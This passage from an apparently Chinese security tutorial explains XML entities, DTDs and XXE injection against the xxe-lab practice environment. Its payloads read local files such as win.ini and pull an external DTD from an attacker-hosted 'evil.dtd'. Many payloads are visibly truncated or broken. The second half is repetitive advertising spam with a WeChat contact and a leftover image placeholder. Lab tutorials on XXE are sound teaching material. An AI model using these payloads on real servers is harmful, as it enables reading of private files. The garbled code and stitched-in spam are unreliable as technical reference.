]>
&test;
(2)参数实体
参数实体的声明:<!ENTITY % 实体名称 "实体内容">
引用参数实体的方法:%实体名称;
%dtd;
%send;
]>
1.4.2、PCDATA
PCDATA 的意思是被解析的字符数据(parsed character data)。
在DTD中,指定某个标签中的内容是字符数据。由于它的内容也是需要解析器来解析的,所有仍然需要转换>, <, &, ', "这5个特殊字符。
在DTD中声明:
<!ELEMENT name (#PCDATA)>它表示在和标签之间可以插入字符或者子标签。
1.4.3、CDATA
CDATA 的意思是字符数据(character data),CDATA 是不会被解析器解析的文本。
在DTD中,指定标签中某个属性的类型为字符型。如果需要使用>, <, &, ', "这5个特殊字符,应当用对应的替代替代字符来表示
在DTD中声明:
<!ATTLIST a b CDATA>它表示在a这个标签中,b属性应该是字符类型。
比如
在XML中声明:
<![CDATA[ if(i<10){ System.out.println("i<10"); } ]]>1.5、DTD
DTD(文档类型定义)的作用是定义 XML 文档的合法构建模块。
DTD 可被成行地声明于 XML 文档中,也可作为一个外部引用。
1.5.1、DTD实体
DTD实体中,又分为内部实体声明和外部实体声明。
- 内部实体声明 :<!ENTITY entity-name "entity-value">
DTD 实例:
<!ENTITY writer "Donald Duck."> <!ENTITY copyright "Copyright runoob.com">XML 实例:
&writer;©right;
- 外部实体声明:<!ENTITY entity-name SYSTEM "URI/URL">
DTD 实例:
<!ENTITY writer SYSTEM "http://www.runoob.com/entities.dtd"> <!ENTITY copyright SYSTEM "http://www.runoob.com/entities.dtd">XML 实例:
&writer;©right;
二、环境下载
xxe-lab:https://github.com/c0ny1/xxe-lab
pikachu:https://github.com/zhuifengshaonianhanlu/pikachu
三、漏洞利用
3.1、XXE漏洞判断
一般看见这样的,就可能存在 XML 外部实体注入即 XXE。
//文件类型为 XML
Content-Type: application/xml;charset=utf-8
//请求头含有XML
X-Requested-With: XMLHttpRequest
//包括数据包中的数据可能是如下的这种形式,都可以进行一个判断
admin123
3.2、有回显XXE
访问 XXE-Lab 的 PHP 环境靶场:http://127.0.0.1/xxe-lab/php_xxe/
随便输入个账号木马然后点击登录进行抓包。
将数据包发送到 Repeater 模块,构造 Payload 读取 win.ini 文件。
<?xml version="1.0"?>]>
&xxe;123
接着再本地随便一个盘符创建一个 xml_test.txt 文件内容为:
, <, &, ', "flag{asdavghagdhjagsdhjas}
尝试对取这个 txt 文本。
<?xml version="1.0"?>]>
&xxe;123
直接报错了,因为我们的文档里含有一些特殊符号 XML 中不允许出现特殊符号。
当读取的数据存在特殊符号的时候,我们可以用 <![CDATA[...]]>。
首先在自己的本地或 vps 上的 Web 目录创建一个 dtd 文件,内容如下:
<!ENTITY all "%start;%xxe;%end;">然后构造 Payload 读取 txt 文本内容。
<?xml version="1.0" encoding="utf-8"?> <!ENTITY % xxe SYSTEM "file:///F:/xml_test.txt"> <!ENTITY % end "]]>"> <!ENTITY % dtd SYSTEM "http://ip/evil.dtd">%dtd; ]>
&all;123
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。
深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!
因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!
由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新
如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!
王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。
对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!
【完整版领取方式在文末!!】
93道网络安全面试题
内容实在太多,不一一截图了
黑客学习资源推荐
最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
1️⃣零基础入门
① 学习路线
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
② 路线对应学习视频
同时每个成长路线对应的板块都有配套的视频提供:
一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
775da.gif#pic_center)
② 路线对应学习视频
同时每个成长路线对应的板块都有配套的视频提供:
一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
[外链图片转存中…(img-drGoLEaq-1712725910781)]